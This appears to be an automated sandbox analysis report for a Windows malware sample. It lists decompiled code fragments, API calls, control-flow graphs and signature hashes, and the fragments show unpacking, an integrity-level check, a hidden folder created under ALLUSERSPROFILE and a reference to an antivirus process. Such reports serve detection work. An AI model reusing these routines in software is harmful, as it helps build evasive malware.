                            control_flow_graph 329 67092b-670970 GetPEB 330 670972-670978 329->330 331 67098c-67098e 330->331 332 67097a-67098a call 670d35 330->332 331->330 334 670990 331->334 332->331 337 670992-670994 332->337 336 670996-670998 334->336 338 670a3b-670a3e 336->338 337->336 339 67099d-6709d3 337->339 340 6709dc-6709ee call 670d0c 339->340 343 6709d5-6709d8 340->343 344 6709f0-670a3a 340->344 343->340 344->338
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .$GetProcAddress.$l
                            • API String ID: 0-2784972518
                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                            • Instruction ID: fdea5112b507ed43f9be9818f2c68c7f3a31b4d59b07ba3e2894d317889efb2f
                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                            • Instruction Fuzzy Hash: 54317AB6910609DFEB10CF99C880AEEBBF6FF48324F24904AD545A7311D771EA45CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 412e19-412e32 2 412e51-412e61 lstrlenW 0->2 3 412e34-412e4e 0->3 4 412e63-412e71 2->4 5 412e74-412e88 LoadLibraryA 2->5 3->2 4->5 7 412e8a-412e90 5->7 9 412e92-412e93 GetListBoxInfo 7->9 10 412e99-412ea3 7->10 9->10 12 412ea5-412eb0 GetProfileStringA 10->12 13 412eb6-412ec3 10->13 12->13 13->7 14 412ec5 13->14 15 412ec7-412ecd 14->15 16 412ed9-412ee3 15->16 17 412ecf-412ed4 15->17 18 412ee5-412ee7 LocalAlloc 16->18 19 412eed-412ef4 16->19 17->16 18->19 19->15 20 412ef6 19->20 21 412ef8-412efe 20->21 22 412f00 21->22 23 412f0a-412f14 21->23 22->23 24 412f16-412f18 TerminateThread 23->24 25 412f1e-412f25 23->25 24->25 25->21 26 412f27-412f2e 25->26 27 412f30-412f3a 26->27 28 412f47-412f57 GetTickCount 27->28 29 412f3c-412f44 GetConsoleCursorInfo 27->29 30 412f59-412f78 GetSystemTime GetLocalTime GetCommandLineA GetPrivateProfileStructW 28->30 31 412f7e-412f84 28->31 29->28 30->31 32 412f86-412f8d 31->32 33 412f98-412f9f 31->33 32->33 34 412f8f-412f96 32->34 33->27 35 412fa1-412fa6 call 412b08 33->35 34->33 34->35 38 412fa8-412fae 35->38 39 412fb0-412fc0 lstrcpyW 38->39 40 412fc6-412fcd 38->40 39->40 40->38 41 412fcf 40->41 42 412fd1-412fd7 41->42 43 412fe3-412fed 42->43 44 412fd9-412fde 42->44 45 412ffc-413003 43->45 46 412fef-412ff9 CreateSemaphoreA 43->46 44->43 45->42 47 413005-41300d 45->47 46->45 48 413049-41304e 47->48 49 41300f-413019 47->49 52 41304f-413059 48->52 50 413025-413034 call 412b66 49->50 51 41301b-41301f GetPrivateProfileIntA 49->51 58 413040-413047 50->58 59 413036-41303a FindResourceExA 50->59 51->50 54 41305b-413064 AddAtomW SetThreadContext 52->54 55 41306a-41306b 52->55 54->55 55->52 57 41306d-413074 55->57 60 41307b-413081 57->60 58->48 58->49 59->58 61 413083 call 412b1c 60->61 62 413088-413092 60->62 61->62 64 413094-4130a5 MoveFileW ContinueDebugEvent DebugBreak 62->64 65 4130ab-4130b2 62->65 64->65 65->60 66 4130b4-4130b9 call 412d7b 65->66 69 4130bb-4130c5 66->69 70 4130c7-4130d8 GetConsoleScreenBufferInfo GetConsoleMode SetCurrentDirectoryW 69->70 71 4130de-4130e4 69->71 70->71 72 4130e6 call 412b55 71->72 73 4130eb-4130f2 71->73 72->73 73->69 75 4130f4 73->75 76 4130f9-413103 75->76 77 413110-413111 76->77 78 413105-41310a GetBinaryTypeW 76->78 77->76 79 413113-41311d call 412b60 77->79 78->77
                            APIs
                            • lstrlenW.KERNEL32(004A4B38), ref: 00412E56
                            • LoadLibraryA.KERNEL32(0041740C), ref: 00412E7B
                            • GetListBoxInfo.USER32(00000000), ref: 00412E93
                            • GetProfileStringA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00412EB0
                            • LocalAlloc.KERNEL32(00000000,00000000), ref: 00412EE7
                            • TerminateThread.KERNEL32(00000000,00000000), ref: 00412F18
                            • GetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 00412F3E
                            • GetTickCount.KERNEL32 ref: 00412F47
                            • GetSystemTime.KERNEL32(00000000), ref: 00412F5A
                            • GetLocalTime.KERNEL32(00000000), ref: 00412F61
                            • GetCommandLineA.KERNEL32 ref: 00412F67
                            • GetPrivateProfileStructW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00412F78
                            • lstrcpyW.KERNEL32(004A4B38,0041741C), ref: 00412FC0
                            • CreateSemaphoreA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00412FF3
                            • GetPrivateProfileIntA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041301F
                            • FindResourceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041303A
                            • AddAtomW.KERNEL32(00000000), ref: 0041305C
                            • SetThreadContext.KERNEL32(00000000,00000000), ref: 00413064
                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00413096
                            • ContinueDebugEvent.KERNEL32(00000000,00000000,00000000), ref: 0041309F
                            • DebugBreak.KERNEL32 ref: 004130A5
                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,00000000), ref: 004130C9
                            • GetConsoleMode.KERNEL32(00000000,00000000), ref: 004130D1
                            • SetCurrentDirectoryW.KERNEL32(00000000), ref: 004130D8
                            • GetBinaryTypeW.KERNEL32(00000000,?), ref: 0041310A
                            Memory Dump Source
                            • Source File: 00000000.00000002.244956693.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_40b000_p9CvI6kq7d.jbxd
                            Similarity
                            • API ID: ConsoleInfoProfile$DebugLocalPrivateThreadTime$AllocAtomBinaryBreakBufferCommandContextContinueCountCreateCurrentCursorDirectoryEventFileFindLibraryLineListLoadModeMoveResourceScreenSemaphoreStringStructSystemTerminateTickTypelstrcpylstrlen
                            • String ID:
                            • API String ID: 3143118104-0
                            • Opcode ID: ef39abcb520fea259e5d21b18f863b1e0f25756422ebacfaa08b98eed59ccb17
                            • Instruction ID: 0a9d982c059fb8aead09ffede9754a7502786d2d5d0686ba2a5e24e7ddd893cf
                            • Opcode Fuzzy Hash: ef39abcb520fea259e5d21b18f863b1e0f25756422ebacfaa08b98eed59ccb17
                            • Instruction Fuzzy Hash: 8171E4B1801204AFD7116B62EEC8AEF3EACE78834AB01543AF546D2121C7BC9DD1877D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 62%
                            			E00406004(intOrPtr _a4) {
                            				struct HINSTANCE__* _v8;
                            				struct _WNDCLASSA _v48;
                            				struct HWND__* _v52;
                            				struct tagMSG _v80;
                            				char _v336;
                            				char _v592;
                            				struct HICON__* _t38;
                            				struct HWND__* _t43;
                            				void* _t54;
                            				void* _t55;
                            
                            				E004066D2( &_v592, _t54 - _t55);
                            				E004066E9("Microsoft", 0xa,  &_v336);
                            				E004066E9("win32app", 9,  &_v592);
                            				_v8 = GetModuleHandleA(0);
                            				_v48.style = 0;
                            				_v48.lpfnWndProc = _a4;
                            				_v48.cbClsExtra = 0;
                            				_v48.cbWndExtra = 0;
                            				_v48.hInstance = _v8;
                            				_v48.lpszMenuName = 0;
                            				_v48.lpszClassName =  &_v592;
                            				_t38 = LoadIconA(0, 0x7f04); // executed
                            				_v48.hIcon = _t38;
                            				_v48.hCursor = LoadCursorA(0, 0x7f01);
                            				_v48.hbrBackground = 6;
                            				RegisterClassA( &_v48);
                            				_push(0);
                            				_push(_v8);
                            				_push(0);
                            				_push(0);
                            				_push(0x96);
                            				_push(0x1f4);
                            				_push(0xfa0);
                            				_push(0xfa0);
                            				_push(0xc80000);
                            				_push( &_v336);
                            				_t43 =  &_v592;
                            				_push(_t43);
                            				ExitProcess(0x80); // executed
                            				_v52 = _t43;
                            				ShowWindow(_v52, 1); // executed
                            				UpdateWindow(_v52);
                            				L1:
                            				GetMessageA( &_v80, 0, 0, 0);
                            				TranslateMessage( &_v80);
                            				DispatchMessageA( &_v80);
                            				goto L1;
                            			}













                            0x00406018
                            0x0040602b
                            0x0040603e
                            0x0040604a
                            0x0040604d
                            0x00406057
                            0x0040605a
                            0x00406061
                            0x0040606b
                            0x0040606e
                            0x0040607b
                            0x00406085
                            0x0040608a
                            0x00406099
                            0x0040609c
                            0x004060a7
                            0x004060ac
                            0x004060ae
                            0x004060b1
                            0x004060b3
                            0x004060b5
                            0x004060ba
                            0x004060bf
                            0x004060c4
                            0x004060c9
                            0x004060d4
                            0x004060d5
                            0x004060db
                            0x004060e1
                            0x004060e6
                            0x004060ee
                            0x004060f6
                            0x004060fb
                            0x00406105
                            0x0040610e
                            0x00406117
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,win32app,00000009,?,Microsoft,0000000A,?,?), ref: 00406045
                            • LoadIconA.USER32(00000000,00007F04), ref: 00406085
                            • LoadCursorA.USER32 ref: 00406094
                            • RegisterClassA.USER32 ref: 004060A7
                            • ExitProcess.KERNEL32(00000080,?,?,00C80000,00000FA0,00000FA0,000001F4,00000096,00000000,00000000,?,00000000,00000000,00000000,00007F01), ref: 004060E1
                            • ShowWindow.USER32(?,00000001,00000080,?,?,00C80000,00000FA0,00000FA0,000001F4,00000096,00000000,00000000,?,00000000,00000000,00000000), ref: 004060EE
                            • UpdateWindow.USER32(?), ref: 004060F6
                            • GetMessageA.USER32 ref: 00406105
                            • TranslateMessage.USER32(?), ref: 0040610E
                            • DispatchMessageA.USER32 ref: 00406117
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$LoadWindow$ClassCursorDispatchExitHandleIconModuleProcessRegisterShowTranslateUpdate
                            • String ID: Microsoft$win32app
                            • API String ID: 2466556465-2644191155
                            • Opcode ID: e177152c5d3084d3485ba6afb722dfc63f9e101a684db8c96d32f3d424c36516
                            • Instruction ID: a62c1bd07abcbf020d24c1e2176d0a4a7506cdeb40d967b6bdc8256d7b7b173d
                            • Opcode Fuzzy Hash: e177152c5d3084d3485ba6afb722dfc63f9e101a684db8c96d32f3d424c36516
                            • Instruction Fuzzy Hash: 1C3101B1E44309BAEB50EFE5CC46FDD76B8AF04704F10417AF614BA1C1D7B966048B9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 100%
                            			E004061E1() {
                            				void* _v8;
                            				void** _v16;
                            				long _v20;
                            				long _v24;
                            				int _t30;
                            
                            				_v24 = 0;
                            				_v20 = 8;
                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                            					_v16 = LocalAlloc(0, _v20);
                            					_t30 = GetTokenInformation(_v8, 0x19, _v16, _v20,  &_v20); // executed
                            					if(_v20 > 8) {
                            						LocalFree(_v16);
                            						_v16 = LocalAlloc(0, _v20);
                            						_t30 = GetTokenInformation(_v8, 0x19, _v16, _v20,  &_v20); // executed
                            					}
                            					if(_t30 != 0 && GetSidSubAuthority( *_v16, 0) != 0) {
                            						E0040664B(_t34,  &_v24, 4);
                            					}
                            					LocalFree(_v16);
                            					CloseHandle(_v8); // executed
                            				}
                            				return _v24;
                            			}








                            0x004061ea
                            0x004061f1
                            0x0040620d
                            0x0040621d
                            0x0040622f
                            0x00406238
                            0x0040623d
                            0x0040624c
                            0x0040625e
                            0x0040625e
                            0x00406265
                            0x0040627e
                            0x0040627e
                            0x00406286
                            0x0040628e
                            0x0040628e
                            0x0040629a

                            APIs
                            • GetCurrentProcess.KERNEL32(?,orvsmwx,00000003), ref: 004061F8
                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,orvsmwx,00000003), ref: 00406206
                            • LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 00406218
                            • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 0040622F
                            • LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 0040623D
                            • LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 00406247
                            • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 0040625E
                            • GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 0040626E
                            • LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 00406286
                            • CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 0040628E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Token$AllocFreeInformationProcess$AuthorityCloseCurrentHandleOpen
                            • String ID: orvsmwx
                            • API String ID: 1358183241-3620674537
                            • Opcode ID: 0b041a2f9728ca39c2c00c1ad31001507997ef3e1b3406f07dd0e0816cc404ba
                            • Instruction ID: 3aa204e1ca70ff1b323e582ef942c756485858ff24be7c0b94b7ba6d815fcb66
                            • Opcode Fuzzy Hash: 0b041a2f9728ca39c2c00c1ad31001507997ef3e1b3406f07dd0e0816cc404ba
                            • Instruction Fuzzy Hash: 1F111771D04109BADF11EBE1CC02EAFBB79BB44708F10457AB211B51D1DB796A109BA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 183 67003c-670047 184 67004c-670263 call 670a3f call 670df8 call 670d90 VirtualAlloc 183->184 185 670049 183->185 200 670265-670289 call 670a69 184->200 201 67028b-670292 184->201 185->184 206 6702ce-6703c2 VirtualProtect call 670cce call 670ce7 200->206 203 6702a1-6702b0 201->203 205 6702b2-6702cc 203->205 203->206 205->203 212 6703d1-6703e0 206->212 213 6703e2-670437 call 670ce7 212->213 214 670439-6704b8 VirtualFree 212->214 213->212 216 6705f4-6705fe 214->216 217 6704be-6704cd 214->217 220 670604-67060d 216->220 221 67077f-670789 216->221 219 6704d3-6704dd 217->219 219->216 225 6704e3-670505 LoadLibraryA 219->225 220->221 226 670613-670637 220->226 223 6707a6-6707b0 221->223 224 67078b-6707a3 221->224 227 6707b6-6707cb 223->227 228 67086e-6708be LoadLibraryA 223->228 224->223 229 670517-670520 225->229 230 670507-670515 225->230 231 67063e-670648 226->231 232 6707d2-6707d5 227->232 235 6708c7-6708f9 228->235 233 670526-670547 229->233 230->233 231->221 234 67064e-67065a 231->234 236 6707d7-6707e0 232->236 237 670824-670833 232->237 238 67054d-670550 233->238 234->221 239 670660-67066a 234->239 240 670902-67091d 235->240 241 6708fb-670901 235->241 242 6707e4-670822 236->242 243 6707e2 236->243 247 670839-67083c 237->247 244 670556-67056b 238->244 245 6705e0-6705ef 238->245 246 67067a-670689 239->246 241->240 242->232 243->237 248 67056f-67057a 244->248 249 67056d 244->249 245->219 250 670750-67077a 246->250 251 67068f-6706b2 246->251 247->228 252 67083e-670847 247->252 254 67057c-670599 248->254 255 67059b-6705bb 248->255 249->245 250->231 256 6706b4-6706ed 251->256 257 6706ef-6706fc 251->257 258 67084b-67086c 252->258 259 670849 252->259 266 6705bd-6705db 254->266 255->266 256->257 260 6706fe-670748 257->260 261 67074b 257->261 258->247 259->228 260->261 261->246 266->238
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0067024D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: cess$kernel32.dll
                            • API String ID: 4275171209-1230238691
                            • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                            • Instruction ID: 482f531de9a673e15bab5d99bba1d20b9055d955ae8799b654930c79a106d657
                            • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                            • Instruction Fuzzy Hash: F3526A74A01229DFEB64CF58C985BA8BBB1BF09304F1480D9E54DAB351DB30AE85DF25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 301 406122-40612c 302 406141-406150 call 405b81 WSACleanup 301->302 303 40612e-40613f DefWindowProcA 301->303 307 406fe5-406fe7 ExitProcess 302->307 304 406155-406159 303->304 304->307
                            C-Code - Quality: 21%
                            			E00406122(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                            				long _t8;
                            
                            				if(_a8 == 0x4a) {
                            					E00405B81(__eflags, "orvsmwx");
                            					L00407148();
                            					ExitProcess(0); // executed
                            					return CreateWindowExA();
                            				}
                            				_t8 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
                            				return _t8;
                            			}




                            0x0040612c
                            0x00406146
                            0x0040614b
                            0x00406fe7
                            0x00406fec
                            0x00406fec
                            0x0040613a
                            0x00406159

                            APIs
                            • DefWindowProcA.USER32(?,0000004A,?,?), ref: 0040613A
                            • WSACleanup.WSOCK32(orvsmwx), ref: 0040614B
                            • ExitProcess.KERNEL32(00000000,0000EA60,a2guard.exe,00002710,00405DB5,00000000,00002710), ref: 00406FE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupExitProcProcessWindow
                            • String ID: J$orvsmwx
                            • API String ID: 4061260214-2586457356
                            • Opcode ID: dd6ebba015e6d2afe40558b8f4ceac486c3cde9062c175a7bfe37e70d4b4a768
                            • Instruction ID: 53691c68dac22b89b9854181e4d0469f849a8a4a38e76f0433a03a62b4bbdec1
                            • Opcode Fuzzy Hash: dd6ebba015e6d2afe40558b8f4ceac486c3cde9062c175a7bfe37e70d4b4a768
                            • Instruction Fuzzy Hash: E8E04831204109F7CB012F86AC02E9B3B29EF41359F01403BFA16380D3457D9571AB6B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 47%
                            			E00405D44(void* __eflags, CHAR* _a4, void* _a8) {
                            				void* _t23;
                            				void* _t27;
                            
                            				_t27 =  &(_a4[GetEnvironmentVariableA("ALLUSERSPROFILE", _a4, 0x100)]);
                            				asm("stosb");
                            				_t4 = E00406A32(0x5c, 4) + 4; // 0x4
                            				_t23 = _t4;
                            				do {
                            					_t11 = E00406A32(_t11, 0x18) + 0x61;
                            					asm("stosb");
                            					_t23 = _t23 - 1;
                            					_t34 = _t23;
                            				} while (_t23 != 0);
                            				asm("stosb");
                            				 *_t27 = 0;
                            				CreateDirectoryA(_a4, 0); // executed
                            				memcpy(_t27, _a8, E0040690B(_t34, _a8));
                            				asm("stosb");
                            				asm("stosb");
                            				asm("stosb");
                            				asm("stosb");
                            				asm("stosb");
                            				return _a4;
                            			}





                            0x00405d5f
                            0x00405d64
                            0x00405d6c
                            0x00405d6c
                            0x00405d6f
                            0x00405d76
                            0x00405d79
                            0x00405d7a
                            0x00405d7a
                            0x00405d7a
                            0x00405d7f
                            0x00405d80
                            0x00405d88
                            0x00405d9a
                            0x00405d9e
                            0x00405da1
                            0x00405da4
                            0x00405da7
                            0x00405daa
                            0x00405db2

                            APIs
                            • GetEnvironmentVariableA.KERNEL32(ALLUSERSPROFILE,?,00000100,orvsmwx,?,00000003,?,00401128,?,orvsmwx,00000000,?,00000100,a2guard.exe,00002710,00405DB5), ref: 00405D57
                            • CreateDirectoryA.KERNEL32(?,00000000,00000018,00000004,ALLUSERSPROFILE,?,00000100,orvsmwx,?,00000003,?,00401128,?,orvsmwx,00000000,?), ref: 00405D88
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateDirectoryEnvironmentVariable
                            • String ID: ALLUSERSPROFILE$orvsmwx
                            • API String ID: 2250995361-2776373528
                            • Opcode ID: b0ab970d59688c1f3a856eb60cee6bf9e551f5a5e72ea3a56912bc58ce2c7b28
                            • Instruction ID: 726bbfcd2f43b28e5ff76a887ac46b0d0d8d5fb25026b89ef5f0ea5ccc7933b8
                            • Opcode Fuzzy Hash: b0ab970d59688c1f3a856eb60cee6bf9e551f5a5e72ea3a56912bc58ce2c7b28
                            • Instruction Fuzzy Hash: 31F0A4392401097EDB00EE1ADC42BCA3F529B59799F549022F7152B2C2DB76A5069FA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 64%
                            			E00405B81(void* __eflags, intOrPtr _a4) {
                            				void* _v8;
                            				char _v16;
                            				char _v1032;
                            				char _v1288;
                            				char _v1544;
                            				char* _t23;
                            				intOrPtr* _t27;
                            				intOrPtr* _t29;
                            				void* _t36;
                            
                            				E004066D2( &_v1544,  &_v16 - _t36);
                            				_push(0);
                            				L004071BA();
                            				E004066E9(0x4090c5, 0x10,  &_v1288);
                            				E004066E9(0x4090d5, 0x10,  &_v1544);
                            				_push( &_v8);
                            				_push( &_v1544);
                            				_push(1);
                            				_push(0);
                            				_t23 =  &_v1288;
                            				_push(_t23); // executed
                            				L004071B4(); // executed
                            				_t38 = _t23;
                            				if(_t23 >= 0) {
                            					E004068D9(_t38, _a4,  &_v1032);
                            					_t27 = _v8;
                            					 *((intOrPtr*)( *((intOrPtr*)( *_t27 + 0x1c))))(_t27,  &_v1032); // executed
                            					_t29 = _v8;
                            					_t23 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 8))))(_t29); // executed
                            				}
                            				L004071C0(); // executed
                            				return _t23;
                            			}












                            0x00405b98
                            0x00405b9d
                            0x00405b9f
                            0x00405bb2
                            0x00405bc5
                            0x00405bcd
                            0x00405bd4
                            0x00405bd5
                            0x00405bd7
                            0x00405bd9
                            0x00405bdf
                            0x00405be0
                            0x00405be5
                            0x00405be8
                            0x00405bf4
                            0x00405c00
                            0x00405c09
                            0x00405c0b
                            0x00405c14
                            0x00405c14
                            0x00405c16
                            0x00405c1f

                            APIs
                            • CoInitialize.OLE32(00000000), ref: 00405B9F
                            • CoCreateInstance.OLE32(?,00000000,00000001,?,?,004090D5,00000010,?,004090C5,00000010,?,?,?,?,?,000000C7), ref: 00405BE0
                            • CoUninitialize.OLE32(?,00000000,00000001,?,?,004090D5,00000010,?,004090C5,00000010,?,?,?,?,?,000000C7), ref: 00405C16
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 948891078-0
                            • Opcode ID: 5e3ef29ae8627ea3b518752bc4e29ed03128baf8a823540f9a71f3ce2cdc141c
                            • Instruction ID: afda16771960026ea4e57ba7b80d7b759fbed178dbd1634576a91aaab0002675
                            • Opcode Fuzzy Hash: 5e3ef29ae8627ea3b518752bc4e29ed03128baf8a823540f9a71f3ce2cdc141c
                            • Instruction Fuzzy Hash: 40112EB6900208AADB10EA95CC81FDF736C9F48304F1045AAF705F61C2DA75EA558B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 346 412b1c-412b54 VirtualProtect
                            APIs
                            • VirtualProtect.KERNELBASE(00000020,?), ref: 00412B4D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244956693.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_40b000_p9CvI6kq7d.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-3916222277
                            • Opcode ID: 0d9fb5f4c326ccbe7e343c98b7afcf78e68aaf9f66025fb44f9083db639246b4
                            • Instruction ID: 16f91666016338ce0897f4535edca2bcbe4508b57b2528009a605c6dad7ded42
                            • Opcode Fuzzy Hash: 0d9fb5f4c326ccbe7e343c98b7afcf78e68aaf9f66025fb44f9083db639246b4
                            • Instruction Fuzzy Hash: D0E0ECB4415348FFDB01CB95FD08BD97FF9E755308F2041A4E50062161D3B56A14AB29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 347 670df8-670e0d SetErrorMode * 2 348 670e14-670e15 347->348 349 670e0f 347->349 349->348
                            APIs
                            • SetErrorMode.KERNELBASE(00000400,?,?,00670223,?,?), ref: 00670E02
                            • SetErrorMode.KERNELBASE(00000000,?,?,00670223,?,?), ref: 00670E07
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction ID: d7bdc270806691586b2b53d89c61f12115b703a719d398b334eb3122813f2461
                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction Fuzzy Hash: C6D0123114512CB7D7002B94DC09BCD7B1C9F05B66F008011FB0DD9181C7B0994047F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 350 670920-670929 TerminateProcess
                            APIs
                            • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00670929
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessTerminate
                            • String ID:
                            • API String ID: 560597551-0
                            • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                            • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                            • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                            • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 351 412b06-412b1b LocalAlloc
                            APIs
                            • LocalAlloc.KERNELBASE(00000000,00412FA6), ref: 00412B10
                            Memory Dump Source
                            • Source File: 00000000.00000002.244956693.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_40b000_p9CvI6kq7d.jbxd
                            Similarity
                            • API ID: AllocLocal
                            • String ID:
                            • API String ID: 3494564517-0
                            • Opcode ID: a22887928bfad020e7f94002ce2ab362a900bae108b0c2023c4fcd785aafee6e
                            • Instruction ID: 6ae84b67e16065d357cd5e632f47d51077d78ac679f32abaf54c515fe20364df
                            • Opcode Fuzzy Hash: a22887928bfad020e7f94002ce2ab362a900bae108b0c2023c4fcd785aafee6e
                            • Instruction Fuzzy Hash: B7B012F50161008AD3004F739C48BC53964E3E5307F118072A70CC1154CB70E2005E3C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LocalAlloc.KERNELBASE(00000000,00412FA6), ref: 00412B10
                            Memory Dump Source
                            • Source File: 00000000.00000002.244956693.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
